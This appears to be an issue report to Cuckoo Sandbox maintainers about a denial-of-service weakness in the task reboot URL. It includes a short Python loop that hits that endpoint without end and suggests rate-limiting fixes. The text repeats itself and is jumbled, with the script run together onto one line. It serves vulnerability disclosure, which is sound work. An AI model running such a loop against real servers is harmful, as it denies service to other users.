Hi Everyone,
I found a problem related to security (the availability of resources), when you are going to restart a task, you can automate this last operation in order to do a DOS attack, with a simple python script, and that remains valid even for the CUCKOO API.
The attacker will do a legitimate operation provided by the Cuckoo Sandbox, he will execute this URL "http://192.168.42.14:8000/analysis/350/reboot/" via a simple call to the Python_request library, and make a loop infinite.
Here is the script that can be used for said attack:
Add a button to restart a task, instead of restarting the task from the URL. (like deleting a task);
Use the Python Ratelimit / Django-Ratelimit libraries, it has provides a decorator to rate-limit views. Limiting can be based on IP address or a field in the request–either a GET or POST variable. (Limiting number of requests per second );
Hi Everyone, I found a problem related to security (the availability of resources), when you are going to restart a task, you can automate this last operation in order to do a DOS attack, with a simple python script, and that remains valid even for the CUCKOO API. The attacker will do a legitimate operation provided by the Cuckoo Sandbox, he will execute this URL "http://192.168.42.14:8000/analysis/350/reboot/" via a simple call to the Python_request library, and make a loop infinite.
Here is the script that can be used for said attack:
import urllib2, base64i=1j=1while i < 2:request = urllib2.Request("http://192.168.42.14:8000/analysis/350/reboot/")base64string = base64.encodestring('%s:%s' % ('', '')).replace('\n', '')request.add_header("Authorization", "Basic %s" % base64string)result = urllib2.urlopen(request)j = j+1Solutions offers:
Thank you. Best regards nadir. @jbremer , @botherder , @jekil , @rep